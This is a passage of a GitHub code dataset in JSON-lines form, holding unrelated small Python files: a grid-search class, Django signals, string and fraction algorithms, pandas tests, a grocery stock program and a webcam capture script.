@property\n    def best_idx_(self):\n        \"\"\"\n        Index of selected model.\n        \"\"\"\n        if self.check_fit():\n            if MEASURE_MIN_GOOD[self.select_metric]:\n                return self.model_sel_scores_[self.select_metric].idxmin()\n            else:\n                return self.model_sel_scores_[self.select_metric].idxmax()\n\n        else:\n            return None\n\n    @property\n    def best_params_(self):\n        \"\"\"\n        Parameter setting for selected model.\n        \"\"\"\n        if self.check_fit():\n            return self.metadata_['fits'][self.best_idx_]['parameters']\n        else:\n            return None\n\n    @property\n    def best_estimator_(self):\n        \"\"\"\n        Selected estimator.\n        \"\"\"\n        if self.check_fit():\n            return self.estimators_[self.best_idx_]\n        else:\n            return None\n\n    def predict(self, X):\n        \"\"\"\n        Predict the labels for the data samples in X using trained model.\n        \"\"\"\n        return self.best_estimator_.predict(X)\n\n    def predict_proba(self, X):\n        \"\"\"\n        Predict posterior probability of each component given the data.\n        \"\"\"\n        return self.best_estimator_.predict_proba(X)\n\n    def sample(self, n_samples=1):\n        \"\"\"\n        Generate random samples from the fitted Gaussian distribution.\n        \"\"\"\n        return self.best_estimator_.sample(n_samples=n_samples)\n\n    def score(self, X, y=None):\n        \"\"\"\n        Compute the per-sample average log-likelihood of the given data X.\n        \"\"\"\n        return self.best_estimator_.score(X)\n\n    def score_samples(self, X):\n        \"\"\"\n        Compute the weighted log probabilities for each sample.\n        \"\"\"\n        return self.best_estimator_.score_samples(X)\n","repo_name":"idc9/mvmm","sub_path":"mvmm/BaseGridSearch.py","file_name":"BaseGridSearch.py","file_ext":"py","file_size_in_byte":4670,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"8473073088","text":"'''Replace the specified string with values from a custom function, then save\n\nAssumes at most one occurrence per line.\n\nCurrent behavior: read slide-01.svg and replace #FFFFFF with an incrementing hexadecimal string.\n\nWritten for a personal drawing project: drawing bands that step from #000000 to #FFFFFF in increments of 1.\n'''\n\nimport os\n\ndef exchangeInMyWay(fileName):\n    writeC = ''\n    counterA = 0\n    fileOpen = open(fileName,'r')\n    # replace this\n    target = '#FFFFFF'\n    targetLong = len(target)\n    for line in fileOpen:\n        if target in line:\n            # replace this\n            hexA = hex(counterA)[2:]\n            hexA = (6 - len(hexA)) * '0' + hexA\n            line = line.replace(target, '#'+hexA, 1)\n            counterA += 1\n        writeC += line\n    writeFile = open('1_'+fileName, 'w')\n    writeFile.write(writeC)\n    writeFile.close()\n    fileOpen.close()\n    #input(counterA)\n\n\n\nexchangeInMyWay('slide-01.svg')\n","repo_name":"Kamilet/learning-coding","sub_path":"simple-program/tools-in-python-shell/Replace-chars-in-file.py","file_name":"Replace-chars-in-file.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36122622639","text":"from django.db.models.signals import m2m_changed, pre_save \nfrom django.dispatch import receiver\nfrom .models import Book , Category\nfrom django.template.defaultfilters import slugify\n#this signal will be emitted when an object of model Book is saved (not yet created in the database, as pre_save is sent at the beginning of the save method)\n#if the admin did not add the available number of copies, it will by default be set equal to the total number of copies\n@receiver(pre_save, sender=Book)\ndef addnig_defaut_fields(sender, instance, *args, **kwargs):\n    if not instance.available_number_of_copies:\n        instance.available_number_of_copies = instance.total_number_of_copies\n\n    # this is in case you want it as a column in the database.\n    # note that the admin doesn't have to enter the slug field, so I used a signal to default it to the slugified title.\n    instance.slug = slugify(instance.title)\n    \n
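With the pre_save receiver above, defaults are filled in transparently at save time; a usage sketch, written as comments because it needs a configured Django project (field values illustrative):

# book = Book(title="Clean Code", total_number_of_copies=3)
# book.save()
# book.available_number_of_copies  # -> 3, copied in by the pre_save receiver
# book.slug                        # -> "clean-code", set by slugify(title)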
#I did that just to simplify dealing with the book model \n\n#this signal will be emitted whenever any change happens in the m2m relationship,\n#which means: whenever a user borrows a copy of the book, the number of copies for this book is reduced by 1,\n#and when a user returns the borrowed copy, the number of copies is increased by 1 \n@receiver(m2m_changed, sender=Book.user.through)\ndef update_available_number_of_copies(*args , **kwargs):\n    if kwargs['action'] == 'post_add':\n        kwargs['instance'].available_number_of_copies -= 1\n    elif kwargs['action'] == 'post_remove':\n        kwargs['instance'].available_number_of_copies += 1\n\n@receiver(pre_save, sender=Category)\ndef addnig_defaut_category_fields(sender, instance, *args, **kwargs):\n    instance.slug = slugify(instance.title)","repo_name":"cod3father/LibraryManagement","sub_path":"Books/signals.py","file_name":"signals.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71040434020","text":"def smallestSubstringContaining(bigString, smallString):\n    targetCharCounts = getCharCounts(smallString)\n    substringBounds = getSubStringBounds(bigString, targetCharCounts)\n    return getStringFromBounds(bigString, substringBounds)\n\n\ndef getSubStringBounds(string, targetCharCounts):\n    subStringBounds = [0, float(\"inf\")]\n    subStringCharCounts = {}\n    numUniqueChar = len(targetCharCounts.keys())\n    numuniqueCharFound = 0\n    leftPtr = 0\n    rightPtr = 0\n    while rightPtr < len(string):\n        rightChar = string[rightPtr]\n        if rightChar not in targetCharCounts:\n            rightPtr += 1\n            continue\n        increaseCharCount(rightChar, subStringCharCounts)\n        if subStringCharCounts[rightChar] == targetCharCounts[rightChar]:\n            numuniqueCharFound += 1\n        while numuniqueCharFound == numUniqueChar and leftPtr <= rightPtr:\n            subStringBounds = getCloserBounds(\n                leftPtr, rightPtr, subStringBounds[0], subStringBounds[1])\n            leftChar = string[leftPtr]\n            if leftChar not in targetCharCounts:\n                leftPtr += 1\n                continue\n            if subStringCharCounts[leftChar] == targetCharCounts[leftChar]:\n                numuniqueCharFound -= 1\n            decreaseCharCount(leftChar, subStringCharCounts)\n            leftPtr += 1\n        rightPtr += 1\n    return subStringBounds\n\n\ndef getCloserBounds(idx1, idx2, idx3, idx4):\n    return [idx1, idx2] if idx2-idx1 < idx4-idx3 else [idx3, idx4]\n\n\ndef getStringFromBounds(string, bounds):\n    start, end = bounds\n    if end == float(\"inf\"):\n        return \"\"\n    return string[start:end+1]\n\n\ndef getCharCounts(string):\n    charCounts = {}\n    for char in string:\n        increaseCharCount(char, charCounts)\n    return charCounts\n\n\ndef increaseCharCount(char, charCounts):\n    if char not in charCounts:\n        charCounts[char] = 0\n    charCounts[char] += 1\n\n\ndef decreaseCharCount(char, charCount):\n    charCount[char] -= 1\n","repo_name":"caleberi/algoexpert","sub_path":"smallestSubstringContaining.py","file_name":"smallestSubstringContaining.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} 
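A quick check of the sliding-window routine above (input strings illustrative):

print(smallestSubstringContaining("aabbccdd", "abc"))
# -> "abbc", the shortest window holding one 'a', one 'b' and one 'c'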
\"shape_predictor_68_face_landmarks.dat\"\n\n# defeine the path to the age network + supporting files\n# company\n# AGE_NETWORK_PATH = \"../../../data/adience/checkpoints/age\"\n# home\nAGE_NETWORK_PATH = \"../../../../data/adience/checkpoints/age\"\n\nAGE_PREFIX = \"agenet\"\nAGE_EPOCH = 150\nAGE_LABEL_ENCODER = path.sep.join([OUTPU_BASE, \"age_le.cpickle\"])\nAGE_MEANS = path.sep.join([OUTPU_BASE, \"age_adience_mean.json\"])\n\n# defeine the path to the gender network + supporting files\n# company\n# GENDER_NETWORK_PATH = \"../../../data/adience/checkpoints/gender\"\n# home\nGENDER_NETWORK_PATH = \"../../../../data/adience/checkpoints/gender\"\n\nGENDER_PREFIX = \"gendernet\"\nGENDER_EPOCH = 110\nGENDER_LABEL_ENCODER = path.sep.join([OUTPU_BASE, \"gender_le.cpickle\"])\nGENDER_MEANS = path.sep.join([OUTPU_BASE, \"gender_adience_mean.json\"])\n\n\n","repo_name":"530634028/ProgramPractice","sub_path":"DLFCV/age_gender/config/age_gender_deploy.py","file_name":"age_gender_deploy.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"41824943904","text":"#!/usr/bin/env python\nimport argparse\nimport asyncio\n\nfrom chain.p2p import P2PServer as Server\nfrom chain.utils.log import logger\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\"port\", type=int, help=\"Listening port\")\nparser.add_argument(\n \"-b\",\n \"--bootstrap\",\n type=lambda x: int(x) if x.isdigit() else x,\n action=\"append\",\n metavar=(\"IP\", \"PORT\"),\n nargs=2,\n help=\"Starting by bootstrapping node, can specify multiple IPs\",\n)\n\nparser.add_argument(\"-m\", \"--mine\", action=\"store_true\", help=\"Mining blocks\")\n\nparser.add_argument(\"-D\", \"--debug\", action=\"store_true\", help=\"Debug mode\")\n\nargs = parser.parse_args()\n\nserver = Server(mining=args.mine)\nserver.listen(args.port)\n\nloop = asyncio.get_event_loop()\nloop.set_debug(args.debug)\n\n\nif args.bootstrap:\n logger.debug(\n loop.run_until_complete(\n server.bootstrap([(ip, port) for ip, port in args.bootstrap])\n )\n )\n\ntry:\n if server.mining:\n loop.run_until_complete(server.mine_blockchain())\n else:\n loop.run_forever()\nexcept KeyboardInterrupt:\n logger.debug(server.blockchain[-5:])\n server.stop()\nfinally:\n loop.close()\n","repo_name":"kigawas/minichain","sub_path":"chain/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"35"} +{"seq_id":"41240807718","text":"# 编写一个函数来查找字符串数组中的最长公共前缀。\n#\n# 如果不存在公共前缀,返回空字符串 \"\"。\n#\n\n# 示例 2:\n#\n# 输入: [\"dog\",\"racecar\",\"car\"]\n# 输出: \"\"\n# 解释: 输入不存在公共前缀。\n# 说明:\n#\n# 所有输入只包含小写字母 a-z 。\n\n# 思路:\n# 记住总长度n,第一个单词,生成k个字典,后边的类似,+=1,最后看总长度\n# 从第一个单词按顺序查字典,如果够长,就算,就给扔到ret\n# 这样是有问题的,字母总归有重复,碰到sss ccc, zzz,难道因为s有三个,就说第一个s是公共的?\n# 第一个整个用index-value存下来,其他的用index访问value对比\nclass Solution:\n def longestCommonPrefix_myself(self, strs):\n \"\"\"\n :type strs: List[str]\n :rtype: str\n \"\"\"\n if strs == []:\n return ''\n dict = {}\n common = len(strs[0])\n for i,s in enumerate(strs):\n count = 0\n # print('i:{0},s:{1}'.format(i,s))\n for j,c in enumerate(s):\n # print('j:{0},c:{1}'.format(j,c))\n if count >= common:\n break\n if dict.get(j) == None:\n if i == 0:#init\n dict[j] = c\n count += 1\n else:\n break\n else:\n if dict.get(j) != c:\n break\n count += 1\n\n dict[j] = c\n # print('count:',count)\n common = count\n # print('common:',common)\n ret = ''\n for i in 
+{"seq_id":"41240807718","text":"# Write a function to find the longest common prefix among an array of strings.\n#\n# If there is no common prefix, return the empty string \"\".\n#\n\n# Example 2:\n#\n# Input: [\"dog\",\"racecar\",\"car\"]\n# Output: \"\"\n# Explanation: the inputs share no common prefix.\n# Note:\n#\n# All inputs consist only of lowercase letters a-z.\n\n# Approach:\n# Remember the total length n; build k dict entries from the first word, handle later words similarly with += 1, and check the total count at the end\n# Then walk the dict in the order of the first word; any char that survives long enough counts and gets appended to ret\n# That is flawed: letters repeat, so given sss ccc zzz, would three occurrences of s make the first s \"common\"?\n# Instead, store the whole first word as index->value entries, and compare the other words against those values by index\nclass Solution:\n    def longestCommonPrefix_myself(self, strs):\n        \"\"\"\n        :type strs: List[str]\n        :rtype: str\n        \"\"\"\n        if strs == []:\n            return ''\n        dict = {}\n        common = len(strs[0])\n        for i,s in enumerate(strs):\n            count = 0\n            # print('i:{0},s:{1}'.format(i,s))\n            for j,c in enumerate(s):\n                # print('j:{0},c:{1}'.format(j,c))\n                if count >= common:\n                    break\n                if dict.get(j) == None:\n                    if i == 0:#init\n                        dict[j] = c\n                        count += 1\n                    else:\n                        break\n                else:\n                    if dict.get(j) != c:\n                        break\n                    count += 1\n\n                    dict[j] = c\n            # print('count:',count)\n            common = count\n            # print('common:',common)\n        ret = ''\n        for i in range(common):\n            ret += dict[i]\n        return ret\n\n    # This one simply uses min and max: scan min against max and keep as many chars as match\n    def longestCommonPrefix(self, strs):\n        \"\"\"\n        :type strs: List[str]\n        :rtype: str\n        \"\"\"\n        if not strs: return ''\n        print(strs)\n        s1 = min(strs)\n        s2 = max(strs)\n        print('s1:',s1)\n        print('s2:',s2)\n        for i, c in enumerate(s1):\n            if c != s2[i]:\n                return s1[:i]\n        return s1\n\n    # This one is, plainly put, a column-wise comparison: compare index by index\n    def longestCommonPrefix_heng(self, s1):\n        \"\"\"\n        :type strs: List[str]\n        :rtype: str\n        \"\"\"\n        if '' in s1 or s1 == []:\n            return ''\n        elif len(s1) == 1:\n            return s1[0]\n        else:\n            min_len1 = min(len(s) for s in s1)\n            flag = 0\n            for j in range(min_len1):# the idea: take the shortest length, then probe every word at one index at a time\n                for i in range(len(s1) - 1):\n                    if s1[i][j] == s1[i + 1][j]:\n                        print('i:{0},j:{1},flag:{2}'.format(i,j,flag))\n                        if i == len(s1) - 2 and flag >= j: ## this line of code matters a lot\n                            flag += 1# the essence of this check: if i reaches the second-to-last word, the j-th letter counts as shared by all words.\n                        else:# mismatches break immediately; on a match, check whether this is the second-to-last word, and only then bump flag.\n                            break\n            if flag > 0:\n                return s1[0][:flag]\n            else:\n                return \"\"\n\n\nstrs = [\"flower\",\"flow\",\"flight\"]\n# strs = [\"aaa\",\"aa\",\"aaa\"]\n# strs=[\"c\",\"acc\",\"ccc\"]\nstrs=[\"flowww\",\"flowwv\",\"flox\"]\ns = Solution()\nprint(s.longestCommonPrefix(strs))\n\n\n\n\n","repo_name":"huqinwei/leetcode","sub_path":"longestCommonPrefix.py","file_name":"longestCommonPrefix.py","file_ext":"py","file_size_in_byte":3533,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} 
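Why comparing only min and max works: the lexicographic minimum and maximum differ the most, so any prefix they share is shared by every string in between. A quick check (values illustrative):

strs = ["flower", "flow", "flight"]
print(min(strs), max(strs))  # 'flight' and 'flower'; their shared prefix 'fl' is the answer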
+{"seq_id":"21082227510","text":"\r\n\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\n# Author: Tien Li Shen\r\n# Date: 3/7/2021\r\n# Class: CS370\r\n\r\nfrom PIL import Image\r\n# Open the image from the working directory\r\nimage = Image.open(\"../data/demosaic/puppy.jpg\")\r\nimg_arr = np.array(image)\r\n\r\nlength, width, channels = img_arr.shape\r\nred_ch = img_arr[:,:,0].flatten()\r\ngre_ch = img_arr[:,:,1].flatten()\r\nblu_ch = img_arr[:,:,2].flatten()\r\n\r\nplt.figure(1)\r\nplt.clf()\r\nplt.subplot(131)\r\nplt.title('red channel'); plt.plot(red_ch[1:],red_ch[:-1], '.', color='red');\r\nplt.subplot(132)\r\nplt.title('green channel'); plt.plot(gre_ch[1:],gre_ch[:-1], '.', color='green');\r\nplt.subplot(133)\r\nplt.title('blue channel'); plt.plot(blu_ch[1:],blu_ch[:-1], '.', color='blue');\r\nplt.show()","repo_name":"tienshen/CS370-Computer-Vision","sub_path":"Project 2/code/pixelNeighborPlot.py","file_name":"pixelNeighborPlot.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"33942455733","text":"# Program to manage a small grocery store's stock and take orders.\n\n# Two 10-slot vectors: one for the product codes and one for the available quantity.\n\ncodigoProdutos = list(range(10))\nquantidadeProdutos = [10, 10, 10, 10, 10, 10, 10, 10, 10, 10]\ncodigoCliente = 1\n\n# Welcome message!\n\nprint('Welcome to Mercadinho Tabajara! Place your order online!')\nprint('----------------------------------------------------------')\nprint('We need your Tabajara Loyalty code!')\nwhile True:\n    codigoCliente = int(input('Enter the customer code (enter 0 to quit): '))\n    # If the customer code is zero, stop the program.\n    if codigoCliente == 0:\n        break\n    # Otherwise, the program asks for more input.\n    else:\n        # Asking for the product code\n        print('Available products:')\n        print('0 - Mineral Water 500ml\\n1 - Pineapple (un)\\n2 - Washing Powder (kg)'\n              '\\n3 - Colgate Toothpaste\\n4 - Qualy Margarine (250g)\\n5 - Reginaldo Rossi Live CD (un)\\n6 - Yogurt Denture Candy (un)'\n              '\\n7 - White Havaiana Flip-Flop with the Blue Strap (un)\\n8 - Condoms (pct)\\n9 - Garoto Chocolate (box)')\n        codigoDigitado = int(input('Enter the code of the desired product (0-9): '))\n        \n        if codigoDigitado in codigoProdutos:\n            # If the entered code is in the product code list, ask for the quantity.\n\n            quantidade = int(input('Product quantity: '))\n            \n            # Comparing the quantity against the value at the desired index; if the stock\n            # covers it, the program subtracts it from the current value.\n            # Order placed successfully.\n\n            if quantidadeProdutos[codigoDigitado] >= quantidade:\n                quantidadeProdutos[codigoDigitado] -= quantidade\n                print('Order received, thank you. Come back anytime!')\n                # Back to the customer code, where the user can place a new order or quit.\n                continue\n\n            # If the stock is insufficient, the program reports it.\n            # The order cannot be placed.\n\n            else:\n                print('Insufficient stock. Try again')\n                break\n\n        # If the product code does not exist, show the user an error.\n\n        else:\n            print('ERROR 404. PRODUCT CODE DOES NOT EXIST')\n            break\n\n# On exit, the program shows the updated stock with the available products and quantities.\n\nprint('----------------------------------------------')\nprint('Updated stock: ')\nprint('Available product codes: ', codigoProdutos)\nprint('Available quantity: ', quantidadeProdutos)\n","repo_name":"rafxrad/inpcodes","sub_path":"mercadinho.py","file_name":"mercadinho.py","file_ext":"py","file_size_in_byte":2768,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"37119765296","text":"import argparse\nimport os, sys\nimport pandas as pd\n\ndef main(argv):\n    fastaFileEndings = [\".fasta\", \".fa\"]\n\n    parser = argparse.ArgumentParser(\n        description=\"Script to rename existing callIDs. This renames the folder and the entries in the included benchmark/time/memory files.\")\n    parser.add_argument(\"-n\", \"--name\", action=\"store\", dest=\"newName\", default=\"\"\n                        , help=\"the new name for the callID given!\")\n    parser.add_argument(\"-c\", \"--callID\", action=\"store\", dest=\"callID\", default=\"\"\n                        , help=\"the callID to be renamed\")\n    parser.add_argument(\"-d\", \"--dir\", action=\"store\", dest=\"outDir\", default=os.path.join(\"..\", \"output\")\n                        , help=\"Folder containing the callID folder to be changed.\")\n\n    args = parser.parse_args()\n\n    # Check whether a callID was given\n    if args.callID == \"\":\n        sys.exit(\"No callID was specified! Please specify a callID using -c or --callID=\")\n\n    # Check whether a name was given\n    if args.newName == \"\":\n        sys.exit(\"No name was specified! 
Please specify a name using -c or --callID=\")\n\n # Check if not trying to overwrite\n if os.path.exists(os.path.join(args.outDir,args.newName)):\n sys.exit(\"Target name already exists, please use a unique name.\")\n\n # Check whether directory path exists\n if not os.path.exists(os.path.join(args.outDir, args.callID)):\n sys.exit(\"Error!!! FilePath does not exist! Please specify it using -o !\")\n\n filePath=os.path.join(args.outDir, args.callID)\n newPath=os.path.join(args.outDir, args.newName)\n\n benchmark = os.path.join(filePath, \"benchmark.csv\")\n memoryUsage = os.path.join(filePath, \"memoryUsage.csv\")\n runTime = os.path.join(filePath, \"runTime.csv\")\n # Check whether the callID folder is intact\n if not os.path.isfile(benchmark) or not os.path.isfile(memoryUsage) or not os.path.isfile(runTime):\n sys.exit(\"Error!!! Incomplete folder!\")\n\n # change callID to new name for memoryUsage.csv\n memory = pd.read_csv(memoryUsage,sep=\";\")\n memory.loc[memory[\"callID\"] == args.callID, \"callID\"] = args.newName\n memory.to_csv(memoryUsage, sep=\";\",index=False)\n\n # change callID to new name for runTime.csv\n time = pd.read_csv(runTime,sep=\";\")\n time.loc[time[\"callID\"] == args.callID, \"callID\"] = args.newName\n time.to_csv(runTime, sep=\";\",index=False)\n\n # change callID to new name for benchmark.csv\n bench = pd.read_csv(benchmark,sep=\";\")\n bench = bench.rename(columns={\"%s_intarna_rank\" % args.callID : \"%s_intarna_rank\" % args.newName})\n bench.to_csv(benchmark, sep=\";\",index=False)\n\n # Finally rename directory\n os.rename(filePath, newPath)\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","repo_name":"BackofenLab/IntaRNA-benchmark","sub_path":"bin/changeCallID.py","file_name":"changeCallID.py","file_ext":"py","file_size_in_byte":2787,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"71577513702","text":"# -*- coding: utf-8 -*-\n# Arithmetc tests for DataFrame/Series/Index/Array classes that should\n# behave identically.\n# Specifically for object dtype\nimport operator\n\nimport pytest\nimport numpy as np\n\nimport pandas as pd\nimport pandas.util.testing as tm\nfrom pandas.core import ops\n\nfrom pandas import Series, Timestamp\n\n\n# ------------------------------------------------------------------\n# Comparisons\n\nclass TestObjectComparisons(object):\n\n def test_comparison_object_numeric_nas(self):\n ser = Series(np.random.randn(10), dtype=object)\n shifted = ser.shift(2)\n\n ops = ['lt', 'le', 'gt', 'ge', 'eq', 'ne']\n for op in ops:\n func = getattr(operator, op)\n\n result = func(ser, shifted)\n expected = func(ser.astype(float), shifted.astype(float))\n tm.assert_series_equal(result, expected)\n\n def test_object_comparisons(self):\n ser = Series(['a', 'b', np.nan, 'c', 'a'])\n\n result = ser == 'a'\n expected = Series([True, False, False, False, True])\n tm.assert_series_equal(result, expected)\n\n result = ser < 'a'\n expected = Series([False, False, False, False, False])\n tm.assert_series_equal(result, expected)\n\n result = ser != 'a'\n expected = -(ser == 'a')\n tm.assert_series_equal(result, expected)\n\n @pytest.mark.parametrize('dtype', [None, object])\n def test_more_na_comparisons(self, dtype):\n left = Series(['a', np.nan, 'c'], dtype=dtype)\n right = Series(['a', np.nan, 'd'], dtype=dtype)\n\n result = left == right\n expected = Series([True, False, False])\n tm.assert_series_equal(result, expected)\n\n result = left != right\n expected = Series([False, True, 
True])\n tm.assert_series_equal(result, expected)\n\n result = left == np.nan\n expected = Series([False, False, False])\n tm.assert_series_equal(result, expected)\n\n result = left != np.nan\n expected = Series([True, True, True])\n tm.assert_series_equal(result, expected)\n\n\n# ------------------------------------------------------------------\n# Arithmetic\n\nclass TestArithmetic(object):\n @pytest.mark.parametrize(\"op\", [operator.add, ops.radd])\n @pytest.mark.parametrize(\"other\", [\"category\", \"Int64\"])\n def test_pos_add_extension_scalar(self, other, box_pos, op):\n # GH#22378\n # Check that scalars satisfying is_extension_array_dtype(obj)\n # do not incorrectly try to dispatch to an ExtensionArray operation\n arr = pd.Series(['a', 'b', 'c'])\n expected = pd.Series([op(x, other) for x in arr])\n\n arr = tm.box_expected(arr, box_pos)\n expected = tm.box_expected(expected, box_pos)\n\n result = op(arr, other)\n tm.assert_equal(result, expected)\n\n @pytest.mark.parametrize(\"op\", [operator.add, ops.radd])\n @pytest.mark.parametrize(\"other\", [\"category\", \"Int64\"])\n def test_add_extension_scalar(self, other, box_neg, op):\n # GH#22378\n # Check that scalars satisfying is_extension_array_dtype(obj)\n # do not incorrectly try to dispatch to an ExtensionArray operation\n arr = pd.Series(['a', 'b', 'c'])\n expected = pd.Series([op(x, other) for x in arr])\n\n arr = tm.box_expected(arr, box_neg)\n expected = tm.box_expected(expected, box_neg)\n\n result = op(arr, other)\n tm.assert_equal(result, expected)\n\n @pytest.mark.parametrize('box', [\n pytest.param(pd.Index,\n marks=pytest.mark.xfail(reason=\"Does not mask nulls\",\n strict=True, raises=TypeError)),\n pd.Series,\n pd.DataFrame\n ], ids=lambda x: x.__name__)\n def test_objarr_add_str(self, box):\n ser = pd.Series(['x', np.nan, 'x'])\n expected = pd.Series(['xa', np.nan, 'xa'])\n\n ser = tm.box_expected(ser, box)\n expected = tm.box_expected(expected, box)\n\n result = ser + 'a'\n tm.assert_equal(result, expected)\n\n @pytest.mark.parametrize('box', [\n pytest.param(pd.Index,\n marks=pytest.mark.xfail(reason=\"Does not mask nulls\",\n strict=True, raises=TypeError)),\n pd.Series,\n pd.DataFrame\n ], ids=lambda x: x.__name__)\n def test_objarr_radd_str(self, box):\n ser = pd.Series(['x', np.nan, 'x'])\n expected = pd.Series(['ax', np.nan, 'ax'])\n\n ser = tm.box_expected(ser, box)\n expected = tm.box_expected(expected, box)\n\n result = 'a' + ser\n tm.assert_equal(result, expected)\n\n @pytest.mark.parametrize('data', [\n [1, 2, 3],\n [1.1, 2.2, 3.3],\n [Timestamp('2011-01-01'), Timestamp('2011-01-02'), pd.NaT],\n ['x', 'y', 1]])\n @pytest.mark.parametrize('dtype', [None, object])\n def test_objarr_radd_str_invalid(self, dtype, data, box):\n ser = Series(data, dtype=dtype)\n\n ser = tm.box_expected(ser, box)\n with pytest.raises(TypeError):\n 'foo_' + ser\n\n @pytest.mark.parametrize('op', [operator.add, ops.radd,\n operator.sub, ops.rsub])\n def test_objarr_add_invalid(self, op, box):\n # invalid ops\n if box is pd.DataFrame and op is ops.radd:\n pytest.xfail(reason=\"DataFrame op incorrectly casts the np.array\"\n \"case to M8[ns]\")\n\n obj_ser = tm.makeObjectSeries()\n obj_ser.name = 'objects'\n\n obj_ser = tm.box_expected(obj_ser, box)\n with pytest.raises(Exception):\n op(obj_ser, 1)\n with pytest.raises(Exception):\n op(obj_ser, np.array(1, dtype=np.int64))\n\n # TODO: Moved from tests.series.test_operators; needs cleanup\n def test_operators_na_handling(self):\n ser = Series(['foo', 'bar', 'baz', np.nan])\n 
result = 'prefix_' + ser\n        expected = pd.Series(['prefix_foo', 'prefix_bar',\n                              'prefix_baz', np.nan])\n        tm.assert_series_equal(result, expected)\n\n        result = ser + '_suffix'\n        expected = pd.Series(['foo_suffix', 'bar_suffix',\n                              'baz_suffix', np.nan])\n        tm.assert_series_equal(result, expected)\n\n    # TODO: parametrize over box\n    @pytest.mark.parametrize('dtype', [None, object])\n    def test_series_with_dtype_radd_timedelta(self, dtype):\n        # note this test is _not_ aimed at timedelta64-dtyped Series\n        ser = pd.Series([pd.Timedelta('1 days'), pd.Timedelta('2 days'),\n                         pd.Timedelta('3 days')], dtype=dtype)\n        expected = pd.Series([pd.Timedelta('4 days'), pd.Timedelta('5 days'),\n                              pd.Timedelta('6 days')])\n\n        result = pd.Timedelta('3 days') + ser\n        tm.assert_series_equal(result, expected)\n\n        result = ser + pd.Timedelta('3 days')\n        tm.assert_series_equal(result, expected)\n","repo_name":"JohnnyPeng18/TypeFix","sub_path":"benchmarks/typebugs/pandas/pandas-22378/pandas/tests/arithmetic/test_object.py","file_name":"test_object.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"35"} +{"seq_id":"1682340217","text":"\"\"\"\nGiven a string representing an expression of fraction addition and subtraction, return the calculation result in string form. The result should be an irreducible fraction, i.e. in lowest terms. If the final result is an integer, e.g. 2, convert it to fraction form with denominator 1, so in that example 2 should be converted to 2/1.\n\nInput: \"-1/2+1/2\"\nOutput: \"0/1\"\nInput: \"-1/2+1/2+1/3\"\nOutput: \"1/3\"\nInput: \"1/3-1/2\"\nOutput: \"-1/6\"\nInput: \"5/3+1/3\"\nOutput: \"2/1\"\n\"\"\"\n\nclass Solution(object):\n    def fractionAddition(self, expression):\n        \"\"\"\n        :type expression: str\n        :rtype: str\n        \"\"\"\n        # greatest common divisor\n        def gcd(a,b):\n            return b if a%b==0 else gcd(b,a%b)\n        # least common multiple\n        def lcm(a,b):\n            return int(a*b/gcd(a,b))\n        # a single fraction means there is no add/subtract operation, so return the input unchanged\n        if expression.count('/') == 1: return expression\n        # implement every subtraction as adding a negative number, which makes the split easy\n        expression = expression.replace('-','+-')\n        tmp = expression.split('+')\n        # tmp_res stores the numerator and denominator of every number taking part in the calculation\n        tmp_res = []\n        for x in tmp:\n            if(len(x)):\n                y = x.split('/')\n                tmp_res.append((int(y[0]),int(y[1])))\n        fm,fz=1,0\n        for x in tmp_res:\n            fm=lcm(fm,x[1])\n        for x in tmp_res:\n            fz+=x[0]*(fm//x[1])\n        if fz==0:return '0/1'\n        gys=gcd(fm,abs(fz))\n        return str(fz//gys)+'/'+str(fm//gys)\n        ","repo_name":"Zu3zz/Leetcode","sub_path":"592-分数加减运算/592.py","file_name":"592.py","file_ext":"py","file_size_in_byte":1581,"program_lang":"python","lang":"zh","doc_type":"code","stars":51,"dataset":"github-code","pt":"35"} 
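The gcd/lcm bookkeeping above can be cross-checked against the standard library, which keeps fractions in lowest terms automatically (inputs illustrative):

from fractions import Fraction

total = Fraction(-1, 2) + Fraction(1, 2) + Fraction(1, 3)
print(f"{total.numerator}/{total.denominator}")  # -> 1/3, matching the expected output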
+{"seq_id":"6567958479","text":"def convert(n, base):  # base-n conversion\n    arr = \"0123456789ABCDEF\"\n    q, r = divmod(n, base)\n    if q == 0:\n        return arr[r]\n    else:\n        return convert(q, base) + arr[r]\n\n\ndef solution(n, t, m, p):\n    answer = \"\"\n    test = \"\"\n    for i in range(m * t):\n        test += str(convert(i, n))\n    # print(test)\n    while len(answer) < t:\n        answer += test[p - 1]\n        p += m\n\n    return answer\n","repo_name":"chojs23/problemSolving","sub_path":"프로그래머스/lv2/[2018 카카오]n 진수 게임(n진법).py","file_name":"[2018 카카오]n 진수 게임(n진법).py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"18221393645","text":"import cv2\nimport matplotlib.pyplot as plt\n\ncap = cv2.VideoCapture(0)\n\nif cap.isOpened():\n    ret, frame = cap.read()\n    print(\"ret \", ret)\n    print(\"Frame \", frame)\n\nelse:\n    ret = False\n\nimg = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\nplt.imshow(img)\nplt.title(\"Camera 